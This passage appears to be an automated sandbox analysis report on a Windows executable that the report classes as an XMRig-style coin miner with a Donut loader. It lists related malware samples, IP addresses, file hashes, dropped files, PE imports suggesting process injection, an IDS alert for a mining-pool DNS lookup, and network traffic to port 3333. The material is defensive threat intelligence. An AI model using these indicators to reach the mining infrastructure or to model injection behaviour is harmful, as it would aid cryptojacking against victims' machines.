                                • 142.202.242.43
                                bg.microsoft.map.fastly.nethttps://www.sitesofconscience.org/Get hashmaliciousUnknownBrowse
                                • 199.232.214.172
                                DHL Package Documents clearance.exeGet hashmaliciousAgentTeslaBrowse
                                • 199.232.214.172
                                https://agrtq.qc.ca/Get hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                http://careertech.orgGet hashmaliciousUnknownBrowse
                                • 199.232.214.172
                                https://www.wiley-epic.com/Get hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                LIHTCPUB_BIN.ACCDBGet hashmaliciousUnknownBrowse
                                • 199.232.214.172
                                https://mattressashamed.comGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                https://olivine-geode-arrow.glitch.meGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                file.exeGet hashmaliciousVidarBrowse
                                • 199.232.210.172
                                file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                • 199.232.210.172
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS-CHOOPAUSSHIPPING_DOCUMENTS.exeGet hashmaliciousFormBookBrowse
                                • 45.77.25.52
                                SHIPPING_DOCS.bat.exeGet hashmaliciousFormBookBrowse
                                • 45.77.25.52
                                https://oxy.st/d/SmUhGet hashmaliciousXmrigBrowse
                                • 95.179.241.203
                                A3LDHn8wqA.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                • 198.13.56.225
                                c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                • 45.77.214.161
                                has.exeGet hashmaliciousXmrigBrowse
                                • 45.76.89.70
                                http://www.horizonservice.netGet hashmaliciousUnknownBrowse
                                • 207.148.0.16
                                file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                • 139.180.171.140
                                http://virtualhealth.comGet hashmaliciousUnknownBrowse
                                • 207.148.0.16
                                https://info.virtualhealth.com/e3t/Ctc/GB+113/cmmfD04/VWRD9T8N6WzjN8MJTHvTlRp-W842MfZ5g9NL_N6-TN-l3qgyTW7Y8-PT6lZ3mfW56Rjx787zhFxW4_YPND6r6flrW4BlJlg1DphdCVWC28Z4PpMbRW6GGMRN2bfpFdW7hSWPP6KFbcRW4PBy7c6n3dRqN7ztR5NtV-d9W1y6F6Z799h-lN1ZbvtmQ73TLW5ShFj48-W2NPW1L2f016vN6bSW45yp6K7Xp_V9W1fy0nl6xLNR_N5n9x3txmtWFN2nZ6w9QgWwJW1rlxcq4rmPQZW2D31f_3FjFXjN7D51x8lx574V_S2G96X3V3rW3xJHsh5zkBZjW6M_Gg24KcjVwW2wm07P9jh6znVyVtyJ6VBB3ZW80wlHc6H0YX2W1stJK56XtGc2f45z9Cx04Get hashmaliciousUnknownBrowse
                                • 207.148.0.16
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Windows\Temp\gtebvdararzg.syshttps://oxy.st/d/SmUhGet hashmaliciousXmrigBrowse
                                  1SE2yI1hsN.exeGet hashmaliciousXmrigBrowse
                                    sky.exeGet hashmaliciousXmrigBrowse
                                      has.exeGet hashmaliciousXmrigBrowse
                                        c3p.exeGet hashmaliciousXmrigBrowse
                                          wk.exeGet hashmaliciousXmrigBrowse
                                            HaQQVRT0Xg.exeGet hashmaliciousRedLine, XmrigBrowse
                                              1hMmINqZK8.exeGet hashmaliciousXmrigBrowse
                                                SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exeGet hashmaliciousXmrigBrowse
                                                  aFc8xaUnnc.exeGet hashmaliciousXmrigBrowse
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3779584
                                                    Entropy (8bit):6.224997459984367
                                                    Encrypted:false
                                                    SSDEEP:49152:nGZDMulRiJu9AkhFPwLZrd4Gz2FP+Jmzu5EFNZf:nGr
                                                    MD5:B99383ADE7723A2376AC12D1FF516AA6
                                                    SHA1:5298425D67725856A9BD85104B5B585B306F2B53
                                                    SHA-256:13A78B0CAC6CE349E4DBFEB770D7C77D598B0ED1C688E7CF915D2F931CD58BF7
                                                    SHA-512:4BEB70A245114051AD3CD36400151629AD79F1735A7A0914FB5E519214511A67F5113C60B17F9700EE39DBF8904A6EA60EC0D86B695E986D8AE51426FD7F7A4C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 45%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.G...G...G...N..K...0..E...0..D...0..N...0..P.......K...G......G...`...T7..F...RichG...........................PE..d....hf.........."....(......7................@..............................9...........`..................................................9...............9...............9.t....j9.T....................k9.(...`i9.@...............P............................text...J........................... ..`.rdata..r.7.......7.................@..@.data...P.....9.......9.............@....pdata........9.......9.............@..@.reloc..t.....9.......9.............@..B................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                    Malicious:false
                                                    Preview:@...e.................................X..............@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Joe Sandbox View:
                                                    • Filename: , Detection: malicious, Browse
                                                    • Filename: 1SE2yI1hsN.exe, Detection: malicious, Browse
                                                    • Filename: sky.exe, Detection: malicious, Browse
                                                    • Filename: has.exe, Detection: malicious, Browse
                                                    • Filename: c3p.exe, Detection: malicious, Browse
                                                    • Filename: wk.exe, Detection: malicious, Browse
                                                    • Filename: HaQQVRT0Xg.exe, Detection: malicious, Browse
                                                    • Filename: 1hMmINqZK8.exe, Detection: malicious, Browse
                                                    • Filename: SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe, Detection: malicious, Browse
                                                    • Filename: aFc8xaUnnc.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                    Entropy (8bit):6.224997459984367
                                                    TrID:
                                                    • Win64 Executable Console (202006/5) 81.26%
                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                    • DOS Executable Generic (2002/1) 0.81%
                                                    File name:file.exe
                                                    File size:3'779'584 bytes
                                                    MD5:b99383ade7723a2376ac12d1ff516aa6
                                                    SHA1:5298425d67725856a9bd85104b5b585b306f2b53
                                                    SHA256:13a78b0cac6ce349e4dbfeb770d7c77d598b0ed1c688e7cf915d2f931cd58bf7
                                                    SHA512:4beb70a245114051ad3cd36400151629ad79f1735a7a0914fb5e519214511a67f5113c60b17f9700ee39dbf8904a6ea60ec0d86b695e986d8ae51426fd7f7a4c
                                                    SSDEEP:49152:nGZDMulRiJu9AkhFPwLZrd4Gz2FP+Jmzu5EFNZf:nGr
                                                    TLSH:DF062320BC556AFCC0A8C230527F5F652EA17D805719E4FB9B9076263E3EBE02D3A54C
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.G...G...G...N...K....0..E....0..D....0..N....0..P.......K...G.......G...`...T7..F...RichG...........................PE..d..
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x14001d2e0
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows cui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6668A5DD [Tue Jun 11 19:30:37 2024 UTC]
                                                    TLS Callbacks:0x4000e300, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:e615d926e29d797368c6f62e2a009561
                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007F571C6F1338h
                                                    dec eax
                                                    add esp, 28h
                                                    jmp 00007F571C6F0EC7h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    nop word ptr [eax+eax+00000000h]
                                                    dec eax
                                                    sub esp, 10h
                                                    dec esp
                                                    mov dword ptr [esp], edx
                                                    dec esp
                                                    mov dword ptr [esp+08h], ebx
                                                    dec ebp
                                                    xor ebx, ebx
                                                    dec esp
                                                    lea edx, dword ptr [esp+18h]
                                                    dec esp
                                                    sub edx, eax
                                                    dec ebp
                                                    cmovb edx, ebx
                                                    dec esp
                                                    mov ebx, dword ptr [00000010h]
                                                    dec ebp
                                                    cmp edx, ebx
                                                    jnc 00007F571C6F1068h
                                                    inc cx
                                                    and edx, 8D4DF000h
                                                    wait
                                                    add al, dh
                                                    Programming Language:
                                                    • [IMP] VS2008 SP1 build 30729
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3999ec0xf0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x39c0000x1380.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x39e0000x474.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x396aa00x54.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x396b000x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3969600x140.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x200000x350.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x1e34a0x1e40008371eff3057e59c283fb773d2fbbbc9False0.5301200929752066data6.3970622105248385IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x200000x37a6720x37a80062301604f68c1271057578b2cbf2d67bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x39b0000x3500x2003b0f8a69f8cd6bbf76e1a42616eb572eFalse0.275390625data2.0204210344500524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x39c0000x13800x1400ea6d4a35d6257f3bd6fbcfcd070f4292False0.5001953125data5.113193827962313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x39e0000x4740x60065e9a2bf662e8d466d04041bc2975864False0.5188802083333334data4.560610387522679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    DLLImport
                                                    api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                                    ntdll.dllNtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject, RtlCaptureContext, RtlVirtualUnwind, RtlLookupFunctionEntry, NtAllocateVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, RtlNtStatusToDosError, NtWriteFile
                                                    KERNEL32.dllGetModuleHandleW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, CreateMutexA, LoadLibraryA, WaitForSingleObjectEx, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleWindow, CreateProcessA, WriteProcessMemory, CreateFileW, CreateFileMappingW, CloseHandle, MapViewOfFile, UnmapViewOfFile, GetCurrentProcess, GetProcAddress, GetCurrentThread, GetLastError, AddVectoredExceptionHandler, SetThreadStackGuarantee, WaitForSingleObject, QueryPerformanceCounter, SetLastError, GetCurrentDirectoryW, GetEnvironmentVariableW, GetStdHandle, GetCurrentProcessId, HeapFree, HeapReAlloc, lstrlenW, ReleaseMutex, GetProcessHeap, HeapAlloc, GetConsoleMode, IsProcessorFeaturePresent, FormatMessageW, ExitProcess
                                                    PSAPI.DLLEnumProcessModulesEx, GetModuleBaseNameW
                                                    USER32.dllSetWindowPos, ShowWindow
                                                    VCRUNTIME140.dll__CxxFrameHandler3, memset, memcmp, memmove, _CxxThrowException, __C_specific_handler, __current_exception, __current_exception_context, memcpy
                                                    api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                    api-ms-win-crt-runtime-l1-1-0.dll_initialize_onexit_table, _seh_filter_exe, _crt_atexit, _configure_narrow_argv, _register_onexit_function, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_narrow_environment, _set_app_type, terminate
                                                    api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                    api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, free
                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    06/17/24-18:15:13.266118UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)6246053192.168.2.61.1.1.1
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jun 17, 2024 18:15:13.277220964 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:13.282968044 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:13.283034086 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:13.283153057 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:13.287940025 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:14.139409065 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:14.185647964 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:25.761567116 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:25.919991970 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:33.691075087 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:33.695832014 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:33.946506023 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:34.107574940 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:40.011950970 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:40.016987085 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:40.268527985 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:40.420027971 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:15:47.935048103 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:15:48.107511044 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:01.135525942 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:01.216944933 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:09.767215967 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:09.920041084 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:23.286271095 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:23.291141033 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:23.620217085 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:23.716950893 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:31.943063021 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:32.107580900 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:16:45.399159908 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:16:45.607582092 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:17:01.134510994 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:17:01.217129946 CEST497173333192.168.2.645.76.89.70
                                                    Jun 17, 2024 18:17:05.915821075 CEST33334971745.76.89.70192.168.2.6
                                                    Jun 17, 2024 18:17:06.107595921 CEST497173333192.168.2.645.76.89.70
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jun 17, 2024 18:15:13.266118050 CEST6246053192.168.2.61.1.1.1
                                                    Jun 17, 2024 18:15:13.274662018 CEST53624601.1.1.1192.168.2.6
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jun 17, 2024 18:15:13.266118050 CEST192.168.2.61.1.1.10x5c44Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jun 17, 2024 18:15:00.043272018 CEST1.1.1.1192.168.2.60x1682No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Jun 17, 2024 18:15:00.043272018 CEST1.1.1.1192.168.2.60x1682No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Jun 17, 2024 18:15:13.274662018 CEST1.1.1.1192.168.2.60x5c44No error (0)pool.hashvault.pro45.76.89.70A (IP address)IN (0x0001)false
                                                    Jun 17, 2024 18:15:13.274662018 CEST1.1.1.1192.168.2.60x5c44No error (0)pool.hashvault.pro95.179.241.203A (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:12:15:04
                                                    Start date:17/06/2024
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0x7ff728770000
                                                    File size:3'779'584 bytes
                                                    MD5 hash:B99383ADE7723A2376AC12D1FF516AA6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:12:15:04
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:12:15:04
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\notepad.exe
                                                    Wow64 process (32bit):
                                                    Commandline:notepad.exe
                                                    Imagebase:
                                                    File size:201'216 bytes
